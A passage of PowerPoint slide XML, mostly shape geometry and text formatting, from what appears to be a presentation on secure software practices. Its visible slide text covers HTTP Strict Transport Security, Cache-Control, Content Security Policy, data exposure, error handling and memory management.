                  <a:pt x="23144" y="822210"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="49103" y="854037"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="82011" y="874904"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="119887" y="882396"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="986536" y="882396"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1024412" y="874904"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1057320" y="854037"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1083279" y="822210"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1100307" y="781836"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1106424" y="735329"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1106424" y="147065"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1100307" y="100559"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1083279" y="60185"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1057320" y="28358"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1024412" y="7491"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="986536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936996" y="4273042"/>
            <a:ext cx="3454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40">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>01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62580" y="4089019"/>
            <a:ext cx="2803525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5715">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="95"/>
              </a:spcBef>
            </a:pP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HTTP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Strict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Transport</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:latin typeface="Lucida Sans Unicode"/>
              <a:cs typeface="Lucida Sans Unicode"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="r" marR="5080">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pP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Sec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rit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(H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)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137138" y="4257878"/>
            <a:ext cx="187515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Cache-Control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584442" y="7072121"/>
            <a:ext cx="3005455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172210" marR="5080" indent="-1160145">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="95"/>
              </a:spcBef>
            </a:pP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Content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Sec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rit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Policy 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(CSP)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2247" y="760476"/>
            <a:ext cx="6192011" cy="365759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7251192" y="3604259"/>
            <a:ext cx="1612900" cy="1612900"/>
            <a:chOff x="7251192" y="3604259"/>
            <a:chExt cx="1612900" cy="1612900"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17" name="object 17"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7251192" y="3604259"/>
              <a:ext cx="1612900" cy="1612900"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1612900" h="1612900">
                  <a:moveTo>
                    <a:pt x="806196" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="758824" y="1368"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="712174" y="5423"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="666320" y="12089"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="621338" y="21291"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="577304" y="32953"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="534294" y="46998"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="492382" y="63353"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="451646" y="81940"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="412159" y="102685"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="373998" y="125512"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="337238" y="150344"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="301956" y="177108"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="268226" y="205726"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="236124" y="236124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="205726" y="268226"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="177108" y="301956"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="150344" y="337238"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="125512" y="373998"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="102685" y="412159"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="81940" y="451646"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="63353" y="492382"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="46998" y="534294"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="32953" y="577304"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21291" y="621338"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12089" y="666320"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5423" y="712174"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1368" y="758824"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="806195"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1368" y="853567"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5423" y="900217"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12089" y="946071"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21291" y="991053"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="32953" y="1035087"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="46998" y="1078097"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="63353" y="1120009"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="81940" y="1160745"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="102685" y="1200232"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="125512" y="1238393"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="150344" y="1275153"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="177108" y="1310435"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="205726" y="1344165"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="236124" y="1376267"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="268226" y="1406665"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="301956" y="1435283"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="337238" y="1462047"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="373998" y="1486879"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="412159" y="1509706"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="451646" y="1530451"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="492382" y="1549038"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="534294" y="1565393"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="577304" y="1579438"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="621338" y="1591100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="666320" y="1600302"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="712174" y="1606968"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="758824" y="1611023"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="806196" y="1612391"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="853567" y="1611023"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="900217" y="1606968"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="946071" y="1600302"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="991053" y="1591100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1035087" y="1579438"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1078097" y="1565393"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1120009" y="1549038"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1160745" y="1530451"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1200232" y="1509706"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1238393" y="1486879"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1275153" y="1462047"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1310435" y="1435283"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1344165" y="1406665"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1376267" y="1376267"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1406665" y="1344165"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1435283" y="1310435"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1462047" y="1275153"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1486879" y="1238393"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1509706" y="1200232"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1530451" y="1160745"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1549038" y="1120009"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1565393" y="1078097"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1579438" y="1035087"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1591100" y="991053"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1600302" y="946071"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1606968" y="900217"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1611023" y="853567"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1612391" y="806195"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1611023" y="758824"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1606968" y="712174"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1600302" y="666320"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1591100" y="621338"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1579438" y="577304"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1565393" y="534294"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1549038" y="492382"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1530451" y="451646"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1509706" y="412159"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1486879" y="373998"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1462047" y="337238"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1435283" y="301956"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1406665" y="268226"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1376267" y="236124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1344165" y="205726"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1310435" y="177108"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1275153" y="150344"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1238393" y="125512"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1200232" y="102685"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1160745" y="81940"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1120009" y="63353"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1078097" y="46998"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1035087" y="32953"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="991053" y="21291"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="946071" y="12089"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="900217" y="5423"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="853567" y="1368"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="806196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5824" y="4087367"/>
              <a:ext cx="644651" cy="6446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38903" y="306451"/>
            <a:ext cx="73767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40">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Data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E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Exposure</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-4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5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45">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Memory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40">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Management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2676" y="760476"/>
            <a:ext cx="10043159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589532" y="3959352"/>
            <a:ext cx="13141960" cy="1976755"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="13141960" h="1976754">
                <a:moveTo>
                  <a:pt x="12812014" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="329438" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="280745" y="3570"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="234274" y="13944"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="190534" y="30611"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="150034" y="53062"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="113283" y="80789"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="80789" y="113283"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="53062" y="150034"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="30611" y="190534"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13944" y="234274"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3570" y="280745"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="329438"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1647189"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3570" y="1695882"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13944" y="1742353"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="30611" y="1786093"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="53062" y="1826593"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="80789" y="1863344"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="113283" y="1895838"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="150034" y="1923565"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="190534" y="1946016"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="234274" y="1962683"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="280745" y="1973057"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="329438" y="1976628"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12812014" y="1976628"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12860706" y="1973057"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12907177" y="1962683"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12950917" y="1946016"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12991417" y="1923565"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13028168" y="1895838"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13060662" y="1863344"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13088389" y="1826593"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13110840" y="1786093"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13127507" y="1742353"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13137881" y="1695882"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13141452" y="1647189"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13141452" y="329438"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13137881" y="280745"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13127507" y="234274"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13110840" y="190534"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13088389" y="150034"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13060662" y="113283"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13028168" y="80789"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12991417" y="53062"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12950917" y="30611"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12907177" y="13944"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12860706" y="3570"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12812014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89532" y="1773935"/>
            <a:ext cx="13141960" cy="1973580"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="13141960" h="1973579">
                <a:moveTo>
                  <a:pt x="12812522" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="328930" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="280335" y="3567"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="233950" y="13930"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="190284" y="30580"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="149847" y="53006"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="113149" y="80698"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="80698" y="113149"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="53006" y="149847"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="30580" y="190284"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13930" y="233950"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3567" y="280335"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="328930"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1644650"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3567" y="1693244"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13930" y="1739629"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="30580" y="1783295"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="53006" y="1823732"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="80698" y="1860430"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="113149" y="1892881"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="149847" y="1920573"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="190284" y="1942999"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="233950" y="1959649"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="280335" y="1970012"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="328930" y="1973580"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12812522" y="1973580"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12861116" y="1970012"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12907501" y="1959649"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12951167" y="1942999"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12991604" y="1920573"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13028302" y="1892881"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13060753" y="1860430"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13088445" y="1823732"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13110871" y="1783295"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13127521" y="1739629"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13137884" y="1693244"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13141452" y="1644650"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13141452" y="328930"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13137884" y="280335"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13127521" y="233950"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13110871" y="190284"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13088445" y="149847"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13060753" y="113149"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13028302" y="80698"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12991604" y="53006"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12951167" y="30580"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12907501" y="13930"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12861116" y="3567"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12812522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313558" y="1942701"/>
            <a:ext cx="11417300" cy="374459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dirty="0" sz="2200" spc="110" b="1">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Data</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-75" b="1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3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Exposure</a:t>
            </a:r>
            <a:endParaRPr sz="22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375"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000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Allows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privileged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3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read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without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authorization</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:latin typeface="Lucida Sans Unicode"/>
              <a:cs typeface="Lucida Sans Unicode"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="355600" indent="-343535">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="370"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000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Lack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authentica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ion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sessio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management</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:latin typeface="Lucida Sans Unicode"/>
              <a:cs typeface="Lucida Sans Unicode"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="355600" indent="-343535">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="375"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000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Lack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encryption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3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dirty="0" sz="2200" spc="35" b="1">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Error</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-50" b="1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2200" spc="50" b="1">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Handling</a:t>
            </a:r>
            <a:endParaRPr sz="22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375"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000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Structured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Exc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ption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Hand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(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EH)</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:latin typeface="Lucida Sans Unicode"/>
              <a:cs typeface="Lucida Sans Unicode"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="355600" marR="5080" indent="-342900">
              <a:lnSpc>
                <a:spcPts val="3010"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="105"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000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Prevents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use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error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conditions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arbitrary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code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injection,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display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default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messages.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89532" y="6147815"/>
            <a:ext cx="13141960" cy="1965960"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="13141960" h="1965959">
                <a:moveTo>
                  <a:pt x="12813791" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="327660" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="279237" y="3552"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="233022" y="13871"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="189521" y="30451"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="149239" y="52784"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="112685" y="80364"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="80364" y="112685"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="52784" y="149239"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="30451" y="189521"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13871" y="233022"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3552" y="279237"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="327659"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1638299"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3552" y="1686719"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13871" y="1732932"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="30451" y="1776433"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="52784" y="1816714"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="80364" y="1853269"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="112685" y="1885590"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="149239" y="1913172"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="189521" y="1935506"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="233022" y="1952087"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="279237" y="1962407"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="327660" y="1965959"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12813791" y="1965959"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12862214" y="1962407"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12908429" y="1952087"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12951930" y="1935506"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12992212" y="1913172"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13028766" y="1885590"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13061087" y="1853269"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13088667" y="1816714"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13111000" y="1776433"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13127580" y="1732932"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13137899" y="1686719"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13141452" y="1638299"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13141452" y="327659"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13137899" y="279237"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13127580" y="233022"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13111000" y="189521"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13088667" y="149239"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13061087" y="112685"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13028766" y="80364"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12992212" y="52784"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12951930" y="30451"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12908429" y="13871"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12862214" y="3552"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12813791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313177" y="6505727"/>
            <a:ext cx="6663055" cy="1173480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dirty="0" sz="2200" spc="110" b="1">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Memory</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-60" b="1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2200" spc="105" b="1">
